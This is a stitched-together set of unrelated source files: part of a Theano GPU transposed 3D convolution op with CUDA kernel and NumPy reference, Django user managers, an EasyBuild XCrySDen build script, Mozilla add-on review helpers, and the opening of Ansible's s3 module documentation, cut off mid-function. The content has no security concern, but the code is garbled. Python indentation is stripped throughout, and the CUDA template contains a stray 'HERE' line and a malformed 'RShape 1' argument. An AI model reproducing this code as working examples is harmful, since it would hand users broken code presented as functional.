if (PyArray_DIMS(%(d)s)[0] != 3)
{
PyErr_Format(PyExc_ValueError,"GpuConvTransp3D: 3 stride length arguments expected (for row, col, and time) but %%li were given", PyArray_DIMS(%(d)s)[0]);
%(fail)s
}
{ // for fail
const int dr = *(dtype_%(d)s*)PyArray_GETPTR1(%(d)s,0);
const int dc = *(dtype_%(d)s*)PyArray_GETPTR1(%(d)s,1);
const int dt = *(dtype_%(d)s*)PyArray_GETPTR1(%(d)s,2);
if (dr <= 0 || dc <= 0 || dt <= 0)
{
PyErr_Format(PyExc_ValueError, "GpuConvTransp3D: Strides must all be positive but are %%i, %%i, %%i",dr,dc,dt);
%(fail)s
}
//Read and check sizes of inputs
{ // for fail
const int batchSize = CudaNdarray_HOST_DIMS(%(H)s)[0];
const int outputChannels = CudaNdarray_HOST_DIMS(%(W)s)[0];
if (CudaNdarray_HOST_DIMS(%(H)s)[4] != outputChannels)
{
PyErr_Format(PyExc_ValueError, "W produces a %%i channel image but the image has %%i channels. W.shape: (%%i, %%i, %%i,%%i, %%i) H.shape: (%%i, %%i, %%i, %%i, %%i)",outputChannels,CudaNdarray_HOST_DIMS(%(H)s)[4], CudaNdarray_HOST_DIMS(%(W)s)[0], CudaNdarray_HOST_DIMS(%(W)s)[1], CudaNdarray_HOST_DIMS(%(W)s)[2], CudaNdarray_HOST_DIMS(%(W)s)[3], CudaNdarray_HOST_DIMS(%(W)s)[4], CudaNdarray_HOST_DIMS(%(H)s)[0], CudaNdarray_HOST_DIMS(%(H)s)[1], CudaNdarray_HOST_DIMS(%(H)s)[2], CudaNdarray_HOST_DIMS(%(H)s)[3], CudaNdarray_HOST_DIMS(%(H)s)[4]);
%(fail)s
}
{ // for fail
const int inputChannels = CudaNdarray_HOST_DIMS(%(W)s)[4];
if (CudaNdarray_HOST_DIMS(%(b)s)[0] != inputChannels)
{
PyErr_Format(PyExc_ValueError, "ConvTransp3D: b operates on a %%i channel image but the image has %%i channels", CudaNdarray_HOST_DIMS(%(b)s)[0], inputChannels );
%(fail)s
}
{ // for fail
const int filterHeight = CudaNdarray_HOST_DIMS(%(W)s)[1];
const int filterWidth = CudaNdarray_HOST_DIMS(%(W)s)[2];
const int filterDur = CudaNdarray_HOST_DIMS(%(W)s)[3];
const int outputHeight = CudaNdarray_HOST_DIMS(%(H)s)[1];
const int outputWidth = CudaNdarray_HOST_DIMS(%(H)s)[2];
const int outputDur = CudaNdarray_HOST_DIMS(%(H)s)[3];
int videoHeight = (outputHeight-1) * dr + filterHeight;
int videoWidth = (outputWidth-1) * dc + filterWidth;
int videoDur = (outputDur-1) * dt + filterDur;
if (%(RShape)s)
{
if (PyArray_NDIM(%(RShape)s) != 1)
{
PyErr_Format(PyExc_ValueError, "RShape must be a vector");
%(fail)s
}
if (PyArray_DIMS(%(RShape)s)[0] != 3)
{
PyErr_Format(PyExc_ValueError, "RShape must specify a 3D shape ( [height,width,duration] )");
%(fail)s
}
{ // for fail
dtype_%(RShape)s RShape0 = *(dtype_%(RShape)s*)PyArray_GETPTR1(%(RShape)s,0);
dtype_%(RShape)s RShape1 = *(dtype_%(RShape)s*)PyArray_GETPTR1(%(RShape)s,1);
dtype_%(RShape)s RShape2 = *(dtype_%(RShape)s*)PyArray_GETPTR1(%(RShape)s,2);
if (RShape0 != -1)
{
if (RShape0 < videoHeight || RShape1 < videoWidth || RShape2 < videoDur)
{
PyErr_Format(PyExc_ValueError, "Reconstruction must have shape of at least [%%i,%%i,%%i] but RShape argument requests that it be [%%i,%%i,%%i]" , videoHeight, videoWidth, videoDur, RShape0, RShape 1, RShape2 );
%(fail)s
}
videoHeight = RShape0;
videoWidth = RShape1;
videoDur = RShape2;
}
}
//Allocate the reconstruction
npy_intp dims[5];
dims[0] = batchSize;
dims[4] = inputChannels;
dims[1] = videoHeight;
dims[2] = videoWidth;
dims[3] = videoDur;
if(!(%(R)s) || CudaNdarray_HOST_DIMS(%(R)s)[0]!=dims[0] ||
CudaNdarray_HOST_DIMS(%(R)s)[1]!=dims[1] ||
CudaNdarray_HOST_DIMS(%(R)s)[2]!=dims[2] ||
CudaNdarray_HOST_DIMS(%(R)s)[3]!=dims[3] ||
CudaNdarray_HOST_DIMS(%(R)s)[4]!=dims[4]){
Py_XDECREF(%(R)s);
%(R)s = (CudaNdarray*)CudaNdarray_NewDims(5,dims);
if (!(%(R)s)) {
PyErr_Format(PyExc_MemoryError,"Could not allocate R");
%(fail)s;
}
}
cudaMemset(CudaNdarray_DEV_DATA(%(R)s), 0, 4 * batchSize * inputChannels * videoHeight * videoWidth * videoDur);
{ // for fail
bool out_contiguous = CudaNdarray_is_c_contiguous(%(R)s);
int version = -1;
int verbose = 0;
bool subsample =(dr>1)||(dc>1)||(dt>1);
bool b_strided = (CudaNdarray_HOST_STRIDES(%(b)s)[0]!=1) && !(CudaNdarray_HOST_STRIDES(%(b)s)[0]==0 && outputChannels==1);
printf("b stride0=%%d\\n",CudaNdarray_HOST_STRIDES(%(b)s)[0]);
bool work_complete = false;
const int ws4 = CudaNdarray_HOST_STRIDES(%(W)s)[4];
const int ws3 = CudaNdarray_HOST_STRIDES(%(W)s)[3];
const int ws2 = CudaNdarray_HOST_STRIDES(%(W)s)[2];
const int ws1 = CudaNdarray_HOST_STRIDES(%(W)s)[1];
const int ws0 = CudaNdarray_HOST_STRIDES(%(W)s)[0];
const int hs4 = CudaNdarray_HOST_STRIDES(%(H)s)[4];
const int hs3 = CudaNdarray_HOST_STRIDES(%(H)s)[3];
const int hs2 = CudaNdarray_HOST_STRIDES(%(H)s)[2];
const int hs1 = CudaNdarray_HOST_STRIDES(%(H)s)[1];
const int hs0 = CudaNdarray_HOST_STRIDES(%(H)s)[0];
if(out_contiguous && (version==0||version==-1) && outputDur<=512 && !work_complete){
//conv_transp_rows_stack
dim3 grid(batchSize * inputChannels, videoHeight * videoWidth);
dim3 threads(videoDur);
HERE
int shared_size=0;
conv_transp_rows_stack<<<grid, threads, shared_size>>>(
CudaNdarray_DEV_DATA(%(H)s), CudaNdarray_DEV_DATA(%(W)s), CudaNdarray_DEV_DATA(%(b)s), CudaNdarray_DEV_DATA(%(R)s),
videoHeight, videoWidth, videoDur,
filterHeight, filterWidth, filterDur,
outputHeight, outputWidth, outputDur,
outputChannels, inputChannels,
dr,dc,dt,
hs3,hs2,hs1,hs4,hs0,
ws3,ws2,ws1,ws4,ws0,
CudaNdarray_HOST_STRIDES(%(b)s)[0]);
CNDA_THREAD_SYNC;
cudaError_t sts = cudaGetLastError();
if (cudaSuccess == sts)
{
work_complete = true;
if (verbose>1) printf("threads.x=%%i, threads.y=%%i, grid.x=%%i, grid.y=%%i, shared_size=%%i, nb_threads=%%i\\n", threads.x, threads.y, grid.x, grid.y, shared_size, threads.x * threads.y);
if (verbose) printf("INFO: used 'conv_transp_rows_stack' version\\n");
}
else
{
if (verbose) printf("threads.x=%%i, threads.y=%%i, grid.x=%%i, grid.y=%%i, shared_size=%%i, nb_threads=%%i\\n", threads.x, threads.y, grid.x, grid.y, shared_size, threads.x * threads.y);
if (verbose) printf("ERROR: all implementations failed for GpuConvTransp3D! (%%s)",cudaGetErrorString(sts));
PyErr_Format(PyExc_RuntimeError, "ERROR: all implementations failed for GpuConvTransp3D! (%%s)",
cudaGetErrorString(sts));
%(fail)s
}
}
if(!work_complete){
PyErr_Format(PyExc_RuntimeError, "ERROR: no implementations executed for this GpuConvTransp3D! out_contiguous=%%d b_strided=%%d outputDur=%%d",
out_contiguous,b_strided,outputDur);
%(fail)s
}
}}}}}} // for fail
///////////// < /code generated by GpuConvTransp3D >
"""
return strutil.render_string(codeSource, locals())
def c_support_code_apply(self, node, nodename):
        # The kernel below computes the transposed 3D convolution: each thread
        # handles one output frame (threadIdx.x) for a given (batch, channel,
        # row, column) grid position, accumulating
        # sum_k W[k, j, rk, ck, tk] * H[i, k, rc, cc, tc] and adding the bias.
codeSource = """
__global__ void
//thread block size = videoDur
//grid block size =(batchSize * inputChannels, videoHeight * videoWidth)
//
conv_transp_rows_stack( float* H, float* kern, float* bias, float* R,
int img_len, int img_wid, int img_dur,
int kern_len, int kern_wid, int kern_dur,
int H_len, int H_wid, int H_dur,
int nkern, int nstack,
int dr, int dc, int dt,
int H_stride_frame, int H_stride_col, int H_stride_row,
int H_stride_stack, int H_stride_batch,
int kern_stride_frame, int kern_stride_col, int kern_stride_row,
int kern_stride_stack, int kern_stride_nkern,
int bias_stride)
{
int __shared__ batch_id, stack_id;
float __shared__ *d_img, *d_kern;
batch_id= blockIdx.x/nstack;
stack_id = blockIdx.x - batch_id*nstack;
const int R_row = blockIdx.y/img_wid;
const int R_col = blockIdx.y%img_wid;
const int R_frame=threadIdx.x;
const int r = R_row;
const int c = R_col;
const int t = R_frame;
const int ftc = max(0, int(ceil(float(t-kern_dur +1 )/float(dt))));
const int fcc = max(0, int(ceil(float(c-kern_wid +1)/float(dc))));
int rc = max(0, int(ceil(float(r-kern_len+1)/float(dr))));
float sum = 0;
while(rc < H_len){
int rk = r - rc * dr;
if(rk < 0)
break;
int cc = fcc;
while( cc < H_wid){
int ck = c - cc * dc;
if(ck < 0)
break;
int tc = ftc;
while(tc < H_dur){
int tk = t - tc * dt;
if(tk < 0)
break;
//R[i,j,r,c,t] += numpy.dot(W[:,j,rk,ck,tk], H[i,:,rc,cc,tc] )
for(int q=0;q<nkern;q++){
sum += kern[q*kern_stride_nkern+stack_id*kern_stride_stack+rk*kern_stride_row+ck*kern_stride_col+tk*kern_stride_frame]*
H[batch_id*H_stride_batch+q*H_stride_stack+rc*H_stride_row+cc*H_stride_col+tc*H_stride_frame];
}
tc += 1;
}
cc += 1;
}
rc += 1;
}
R[batch_id*nstack*img_len*img_wid*img_dur+//the good batch
stack_id+//the output image
R_row*img_wid*img_dur*nstack+//the output row
R_col*img_dur*nstack + //the output_col
R_frame*nstack] = sum + bias[stack_id*bias_stride];
}
"""
return codeSource
gpu_conv_transpd = GpuConvTransp3D()
@local_optimizer([ConvTransp3D])
def local_gpu_conv_transp3d(node):
if isinstance(node.op, ConvTransp3D):
if numpy.any([i.owner and isinstance(i.owner.op, HostFromGpu)
for i in node.inputs]):
if numpy.all([o.type.dtype == 'float32' for o in node.outputs]):
W, b, d, H, RShape = node.inputs
return [host_from_gpu(gpu_conv_transpd(W, b, d, H, RShape))]
# Not enabled by default as we don't want people to use it.
gpu_optimizer.register("local_gpu_conv_transp3d", local_gpu_conv_transp3d)
# If the input size wasn't a multiple of D we may need some automatic padding to get the right reconstruction size
def computeR(W, b, d, H, Rshape=None):
assert len(W.shape) == 5
assert len(H.shape) == 5
assert len(b.shape) == 1
assert len(d) == 3
outputChannels, inputChannels, filterHeight, filterWidth, filterDur = W.shape
batchSize, outputChannelsAgain, outputHeight, outputWidth, outputDur = H.shape
assert outputChannelsAgain == outputChannels
assert b.shape[0] == inputChannels
dr, dc, dt = d
assert dr > 0
assert dc > 0
assert dt > 0
videoHeight = (outputHeight-1) * dr + filterHeight
videoWidth = (outputWidth-1) * dc + filterWidth
videoDur = (outputDur-1) * dt + filterDur
if Rshape is not None and Rshape[0] != -1:
if Rshape[0] < videoHeight:
print((Rshape[0], videoHeight))
assert False
assert Rshape[1] >= videoWidth
assert Rshape[2] >= videoDur
# print "setting video size to Rshape = "+str(Rshape)
videoHeight, videoWidth, videoDur = Rshape
# else:
# print "No Rshape passed in"
# print "video size: "+str((videoHeight, videoWidth, videoDur))
R = numpy.zeros( (batchSize, inputChannels, videoHeight,
videoWidth, videoDur ) , dtype=H.dtype)
# R[i,j,r,c,t] = b_j + sum_{rc,rk | d \circ rc + rk = r} sum_{cc,ck | ...} sum_{tc,tk | ...} sum_k W[k, j, rk, ck, tk] * H[i,k,rc,cc,tc]
for i in xrange(0, batchSize):
# print '\texample '+str(i+1)+'/'+str(batchSize)
for j in xrange(0, inputChannels):
# print '\t\tfeature map '+str(j+1)+'/'+str(inputChannels)
for r in xrange(0, videoHeight):
# print '\t\t\trow '+str(r+1)+'/'+str(videoHeight)
for c in xrange(0, videoWidth):
for t in xrange(0, videoDur):
R[i, j, r, c, t] = b[j]
ftc = max([0, int(numpy.ceil(float(t-filterDur + 1 )/float(dt))) ])
fcc = max([0, int(numpy.ceil(float(c-filterWidth + 1)/float(dc))) ])
rc = max([0, int(numpy.ceil(float(r-filterHeight+1)/float(dr))) ])
while rc < outputHeight:
rk = r - rc * dr
if rk < 0:
break
cc = fcc
while cc < outputWidth:
ck = c - cc * dc
if ck < 0:
break
tc = ftc
while tc < outputDur:
tk = t - tc * dt
if tk < 0:
break
R[i, j, r, c, t] += numpy.dot(W[:, j, rk, ck, tk], H[i, :, rc, cc, tc] )
tc += 1
"" # close loop over tc
cc += 1
"" # close loop over cc
rc += 1
"" # close loop over rc
"" # close loop over t
"" # close loop over c
"" # close loop over r
"" # close loop over j
"" # close loop over i
return R
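# A shape sanity check for computeR, as a hedged sketch (the shapes below are
# hypothetical and only illustrate the size formula used above):
#
#   W = numpy.zeros((2, 3, 4, 4, 4), dtype='float32')  # (outChans, inChans, h, w, dur)
#   b = numpy.zeros(3, dtype='float32')
#   H = numpy.zeros((1, 2, 5, 5, 5), dtype='float32')  # (batch, outChans, outH, outW, outDur)
#   R = computeR(W, b, numpy.array([2, 2, 2]), H)
#   # R.shape == (1, 3, (5-1)*2+4, (5-1)*2+4, (5-1)*2+4) == (1, 3, 12, 12, 12)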
|
from django.db import models
from django.contrib.auth.models import BaseUserManager
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template.context import Context
from django.conf import settings
from django.db.models import Q
from mail.tasks import send_mail
class UserManager(BaseUserManager):
"""
UserManager class.
"""
def _create_user(self, username, email, password, send_welcome_email=True, **kwargs):
now = timezone.now()
if username is None:
raise ValueError("Username must be set")
if email is None:
raise ValueError("Email must be set")
email = self.normalize_email(email)
user = self.model(
username=username,
email=email,
registration_date=now,
**kwargs
)
user.set_password(password)
user.save()
if send_welcome_email or not user.is_active:
from .models import UserCode
activation_code = UserCode.objects.generate_code(user, 'account_activation')
template_plain = get_template("user/mail/welcome.txt")
template_html = get_template("user/mail/welcome.html")
ctx = Context({
'the_user': user,
'site_url': settings.SITE_URL,
'activation_code': activation_code
})
content_plain = template_plain.render(ctx)
content_html = template_html.render(ctx)
mail = EmailMultiAlternatives(_("Welcome to the Study!"), content_plain, "[email protected]", [user.email])
mail.attach_alternative(content_html, 'text/html')
send_mail.apply_async(kwargs={
'mail': mail,
})
return user
def create_user(self, username, email, password, **kwargs):
"""
Create new user.
:param username: A user's name.
:type username: str
        :param email: A user's email.
        :type email: str
        :param password: A user's password.
        :type password: str
        :param kwargs: Additional user kwargs.
        :return: Instance of a user.
        :rtype: UserProfile
"""
kwargs.setdefault('is_staff', False)
kwargs.setdefault('is_superuser', False)
return self._create_user(username, email, password, **kwargs)
def create_superuser(self, username, email, password, **kwargs):
"""
Create new superuser.
:param username: A user's name.
:type username: str
        :param email: A user's email.
        :type email: str
        :param password: A user's password.
        :type password: str
        :param kwargs: Additional user kwargs.
        :return: Instance of a user.
        :rtype: UserProfile
"""
kwargs.setdefault('is_staff', True)
kwargs.setdefault('is_superuser', True)
kwargs.setdefault('is_active', True)
if kwargs.get('is_staff') is False:
raise ValueError("Superuser must have to set is_staff to True")
if kwargs.get('is_superuser') is False:
raise ValueError("Superuser must have to set is_superuser to True")
return self._create_user(username, email, password, **kwargs)
class UserLogEntryManager(models.Manager):
"""
UserLogEntryManager class.
"""
def add_entry(self, user, message, **kwargs):
"""
Add an entry to the specified user.
        :param user: A user's instance.
        :type user: UserProfile
        :param message: The message of the log entry.
        :type message: str
        :param kwargs: Additional UserLogEntry kwargs.
        :return: Instance of a log entry.
:rtype: UserLogEntry
"""
if user is None:
raise ValueError("User must be set")
if message is None:
raise ValueError("Message must be set")
log_entry = self.model(
user=user,
message=message,
**kwargs
)
log_entry.save()
return log_entry
class UserCodeManager(models.Manager):
def generate_code(self, user, type, expiration_date=None, **kwargs):
"""
Generate a code to the specified user.
        :param user: A user's instance.
:type user: UserProfile
:param type: A type of code.
:type type: str
:param expiration_date: Date of code expiration. If None the code will never expire.
:type expiration_date: datetime
        :param kwargs: Additional code kwargs.
        :return: Instance of a UserCode.
        :rtype: UserCode
"""
if user is None:
raise ValueError("User must be set")
if type is None:
raise ValueError("Type must be set")
code = self.model(
user=user,
type=type,
expiration_date=expiration_date,
**kwargs
)
code.save()
return code
def get_code(self, code, type, **kwargs):
"""
Get the UserCode instance.
:param code: A code.
:param type: A type.
        :param user: A user's instance.
        :return: Instance of a UserCode.
        :rtype: UserCode
"""
if code is None:
raise ValueError("Code must be set")
if type is None:
raise ValueError("Type must be set")
return self.get(
Q(expiration_date=None) | Q(expiration_date__gte=timezone.now()),
is_used=False,
code=code,
type=type,
**kwargs
)
class UserNotificationManager(models.Manager):
def add_notification(self, user, message, **kwargs):
"""
Add notification to the specified user.
        :param user: A user's instance.
        :type user: UserProfile
        :param message: A notification message.
        :type message: str
        :param kwargs: Additional notification kwargs.
:return: A UserNotification instance
:rtype: UserNotification
"""
if user is None:
raise ValueError("User must be set")
if message is None:
raise ValueError("Message must be set")
notification = self.model(
user=user,
message=message,
**kwargs
)
notification.save()
return notification
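# A minimal usage sketch, assuming these managers are attached to the
# corresponding models (UserProfile, UserCode, ...) as their default managers;
# the names, credentials and code type below are purely illustrative:
#
#   user = UserProfile.objects.create_user('alice', '[email protected]', 's3cret')
#   code = UserCode.objects.generate_code(user, 'password_reset')
#   UserCode.objects.get_code(code.code, 'password_reset')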
|
##
# Copyright 2012 Ghent University
# Copyright 2012 Kenneth Hoste
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing XCrySDen, implemented as an easyblock
"""
import fileinput
import os
import re
import shutil
import sys
from easybuild.easyblocks.generic.configuremake import ConfigureMake
from easybuild.tools.modules import get_software_root, get_software_version
class EB_XCrySDen(ConfigureMake):
"""Support for building/installing XCrySDen."""
def configure_step(self):
"""
Check required dependencies, configure XCrySDen build by patching Make.sys file
and set make target and installation prefix.
"""
# check dependencies
deps = ["Mesa", "Tcl", "Tk"]
for dep in deps:
if not get_software_root(dep):
self.log.error("Module for dependency %s not loaded." % dep)
        # copy the template Make.sys so it can be patched below
makesys_tpl_file = os.path.join("system", "Make.sys-shared")
makesys_file = "Make.sys"
try:
shutil.copy2(makesys_tpl_file, makesys_file)
except OSError, err:
self.log.error("Failed to copy %s: %s" % (makesys_tpl_file, err))
# patch Make.sys
settings = {
'CFLAGS': os.getenv('CFLAGS'),
'CC': os.getenv('CC'),
'FFLAGS': os.getenv('F90FLAGS'),
'FC': os.getenv('F90'),
'TCL_LIB': "-L%s/lib -ltcl%s" % (get_software_root("Tcl"),
'.'.join(get_software_version("Tcl").split('.')[0:2])),
'TCL_INCDIR': "-I%s/include" % get_software_root("Tcl"),
'TK_LIB': "-L%s/lib -ltk%s" % (get_software_root("Tk"),
'.'.join(get_software_version("Tcl").split('.')[0:2])),
'TK_INCDIR': "-I%s/include" % get_software_root("Tk"),
'GLU_LIB': "-L%s/lib -lGLU" % get_software_root("Mesa"),
'GL_LIB': "-L%s/lib -lGL" % get_software_root("Mesa"),
'GL_INCDIR': "-I%s/include" % get_software_root("Mesa"),
'FFTW3_LIB': "-L%s %s -L%s %s" % (os.getenv('FFTW_LIB_DIR'), os.getenv('LIBFFT'),
os.getenv('LAPACK_LIB_DIR'), os.getenv('LIBLAPACK_MT')),
'FFTW3_INCDIR': "-I%s" % os.getenv('FFTW_INC_DIR'),
'COMPILE_TCLTK': 'no',
'COMPILE_MESA': 'no',
'COMPILE_FFTW': 'no',
'COMPILE_MESCHACH': 'no'
}
for line in fileinput.input(makesys_file, inplace=1, backup='.orig'):
# set config parameters
for (k, v) in settings.items():
regexp = re.compile('^%s(\s+=).*'% k)
if regexp.search(line):
line = regexp.sub('%s\\1 %s' % (k, v), line)
# remove replaced key/value pairs
settings.pop(k)
sys.stdout.write(line)
f = open(makesys_file, "a")
# append remaining key/value pairs
for (k, v) in settings.items():
f.write("%s = %s\n" % (k, v))
f.close()
self.log.debug("Patched Make.sys: %s" % open(makesys_file, "r").read())
# set make target to 'xcrysden', such that dependencies are not downloaded/built
self.cfg.update('makeopts', 'xcrysden')
# set installation prefix
self.cfg.update('preinstallopts', 'prefix=%s' % self.installdir)
# default 'make' and 'make install' should be fine
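        # A standalone sketch (hypothetical values) of the substitution applied
        # to each Make.sys line above:
        #
        #   regexp = re.compile('^%s(\s+=).*' % 'CC')
        #   regexp.sub('%s\\1 %s' % ('CC', 'gcc'), 'CC      = cc')
        #   # -> 'CC      = gcc'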
def sanity_check_step(self):
"""Custom sanity check for XCrySDen."""
custom_paths = {'files': ["bin/%s" % x for x in ["ptable", "pwi2xsf", "pwo2xsf", "unitconv", "xcrysden"]] +
["lib/%s-%s/%s" % (self.name.lower(), self.version, x)
for x in ["atomlab", "calplane", "cube2xsf", "fhi_coord2xcr", "fhi_inpini2ftn34",
"fracCoor", "fsReadBXSF", "ftnunit", "gengeom", "kPath", "multislab",
"nn", "pwi2xsf", "pwi2xsf_old", "pwKPath", "recvec", "savestruct",
"str2xcr", "wn_readbakgen", "wn_readbands", "xcrys", "xctclsh",
"xsf2xsf"]],
'dirs':[]
}
super(EB_XCrySDen, self).sanity_check_step(custom_paths=custom_paths)
def make_module_extra(self):
"""Set extra environment variables in module file."""
txt = super(EB_XCrySDen, self).make_module_extra()
for lib in ['Tcl', 'Tk']:
ver = '.'.join(get_software_version(lib).split('.')[0:2])
libpath = os.path.join(get_software_root(lib), 'lib', "%s%s" % (lib.lower(), ver))
txt += self.moduleGenerator.set_environment('%s_LIBRARY' % lib.upper(), libpath)
return txt
|
import jinja2
import jingo
from tower import ugettext as _
from access import acl
from reviews.models import ReviewFlag
from . import forms
@jingo.register.filter
def stars(num, large=False):
    # check for 0.0 in case None was cast to a float. Should
    # be safe since the lowest rating you can give is 1.0
if num is None or num == 0.0:
return _('Not yet rated')
else:
num = min(5, int(round(num)))
t = jingo.env.get_template('reviews/impala/reviews_rating.html')
# These are getting renamed for contextual sense in the template.
return jinja2.Markup(t.render(rating=num, detailpage=large))
@jingo.register.function
def reviews_link(addon, collection_uuid=None, link_to_list=False):
t = jingo.env.get_template('reviews/reviews_link.html')
return jinja2.Markup(t.render(addon=addon, link_to_list=link_to_list,
collection_uuid=collection_uuid))
@jingo.register.function
def impala_reviews_link(addon, collection_uuid=None):
t = jingo.env.get_template('reviews/impala/reviews_link.html')
return jinja2.Markup(t.render(addon=addon,
collection_uuid=collection_uuid))
@jingo.register.inclusion_tag('reviews/mobile/reviews_link.html')
@jinja2.contextfunction
def mobile_reviews_link(context, addon):
c = dict(context.items())
c.update(addon=addon)
return c
@jingo.register.inclusion_tag('reviews/report_review.html')
@jinja2.contextfunction
def report_review_popup(context):
c = dict(context.items())
c.update(ReviewFlag=ReviewFlag, flag_form=forms.ReviewFlagForm())
return c
@jingo.register.inclusion_tag('reviews/edit_review.html')
@jinja2.contextfunction
def edit_review_form(context):
c = dict(context.items())
c.update(form=forms.ReviewForm())
return c
def user_can_delete_review(request, review):
"""Return whether or not the request.user can delete reviews.
People who can delete reviews:
* The original review author.
* Editors, but only if they aren't listed as an author of the add-on.
* Users in a group with "Users:Edit" privileges.
* Users in a group with "Addons:Edit" privileges.
TODO: Make this more granular when we have multiple reviewer types, e.g.
persona reviewers shouldn't be able to delete add-on reviews.
"""
is_editor = acl.check_reviewer(request)
is_author = review.addon.has_author(request.user)
return (
review.user_id == request.user.id or
not is_author and (
is_editor or
acl.action_allowed(request, 'Users', 'Edit') or
acl.action_allowed(request, 'Addons', 'Edit')))
@jingo.register.function
@jinja2.contextfunction
def check_review_delete(context, review):
return user_can_delete_review(context['request'], review)
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: s3
short_description: manage objects in S3.
description:
- This module allows the user to manage S3 buckets and the objects within them. Includes support for creating and deleting both objects and buckets, retrieving objects as files or strings and generating download links. This module has a dependency on python-boto.
version_added: "1.1"
options:
aws_access_key:
description:
- AWS access key id. If not set then the value of the AWS_ACCESS_KEY environment variable is used.
required: false
default: null
aliases: [ 'ec2_access_key', 'access_key' ]
aws_secret_key:
description:
- AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used.
required: false
default: null
aliases: ['ec2_secret_key', 'secret_key']
bucket:
description:
- Bucket name.
required: true
default: null
aliases: []
dest:
description:
- The destination file path when downloading an object/key with a GET operation.
required: false
aliases: []
version_added: "1.3"
encrypt:
description:
- When set for PUT mode, asks for server-side encryption
required: false
default: no
version_added: "2.0"
expiration:
description:
- Time limit (in seconds) for the URL generated and returned by S3/Walrus when performing a mode=put or mode=geturl operation.
required: false
default: 600
aliases: []
headers:
description:
- Custom headers for PUT operation, as a dictionary of 'key=value' and 'key=value,key=value'.
required: false
default: null
version_added: "2.0"
marker:
description:
      - Specifies the key to start with when using list mode. Object keys are returned in alphabetical order, starting with the key after the marker.
required: false
default: null
version_added: "2.0"
max_keys:
description:
- Max number of results to return in list mode, set this if you want to retrieve fewer than the default 1000 keys.
required: false
default: 1000
version_added: "2.0"
metadata:
description:
- Metadata for PUT operation, as a dictionary of 'key=value' and 'key=value,key=value'.
required: false
default: null
version_added: "1.6"
mode:
description:
      - Switches the module behaviour between put (upload), get (download), geturl (return download URL, Ansible 1.3+), getstr (download object as string, 1.3+), list (list keys, 2.0+), create (bucket), delete (bucket) and delobj (delete object).
required: true
default: null
aliases: []
object:
description:
- Keyname of the object inside the bucket. Can be used to create "virtual directories", see examples.
required: false
default: null
permission:
description:
      - This option lets the user set the canned permissions on the object/bucket that are created. The permissions that can be set are 'private', 'public-read', 'public-read-write', 'authenticated-read'.
required: false
default: private
version_added: "2.0"
prefix:
description:
- Limits the response to keys that begin with the specified prefix for list mode
required: false
default: null
version_added: "2.0"
version:
description:
- Version ID of the object inside the bucket. Can be used to get a specific version of a file if versioning is enabled in the target bucket.
required: false
default: null
aliases: []
version_added: "2.0"
overwrite:
description:
- Force overwrite either locally on the filesystem or remotely with the object/key. Used with PUT and GET operations.
required: false
default: true
version_added: "1.2"
region:
description:
- "AWS region to create the bucket in. If not set then the value of the AWS_REGION and EC2_REGION environment variables are checked, followed by the aws_region and ec2_region settings in the Boto config file. If none of those are set the region defaults to the S3 Location: US Standard. Prior to ansible 1.8 this parameter could be specified but had no effect."
required: false
default: null
version_added: "1.8"
retries:
description:
- On recoverable failure, how many times to retry before actually failing.
required: false
default: 0
version_added: "2.0"
s3_url:
description:
      - S3 URL endpoint for usage with Eucalyptus, fakes3, etc. Otherwise assumes AWS.
default: null
aliases: [ S3_URL ]
src:
description:
- The source file path when performing a PUT operation.
required: false
default: null
aliases: []
version_added: "1.3"
requirements: [ "boto" ]
author:
- "Lester Wade (@lwade)"
- "Ralph Tice (@ralph-tice)"
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Simple PUT operation
- s3: bucket=mybucket object=/my/desired/key.txt src=/usr/local/myfile.txt mode=put
# Simple GET operation
- s3: bucket=mybucket object=/my/desired/key.txt dest=/usr/local/myfile.txt mode=get
# Get a specific version of an object.
- s3: bucket=mybucket object=/my/desired/key.txt version=48c9ee5131af7a716edc22df9772aa6f dest=/usr/local/myfile.txt mode=get
# PUT/upload with metadata
- s3: bucket=mybucket object=/my/desired/key.txt src=/usr/local/myfile.txt mode=put metadata='Content-Encoding=gzip,Cache-Control=no-cache'
# PUT/upload with custom headers
- s3: bucket=mybucket object=/my/desired/key.txt src=/usr/local/myfile.txt mode=put [email protected]
# List keys simple
- s3: bucket=mybucket mode=list
# List keys all options
- s3: bucket=mybucket mode=list prefix=/my/desired/ marker=/my/desired/0023.txt max_keys=472
# Create an empty bucket
- s3: bucket=mybucket mode=create permission=public-read
# Create a bucket with key as directory, in the EU region
- s3: bucket=mybucket object=/my/directory/path mode=create region=eu-west-1
# Delete a bucket and all contents
- s3: bucket=mybucket mode=delete
# GET an object but don't download if the file checksums match
- s3: bucket=mybucket object=/my/desired/key.txt dest=/usr/local/myfile.txt mode=get overwrite=different
# Delete an object from a bucket
- s3: bucket=mybucket object=/my/desired/key.txt mode=delobj
'''
import os
import urlparse
from ssl import SSLError
try:
import boto
import boto.ec2
from boto.s3.connection import Location
from boto.s3.connection import OrdinaryCallingFormat
from boto.s3.connection import S3Connection
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def key_check(module, s3, bucket, obj, version=None):
try:
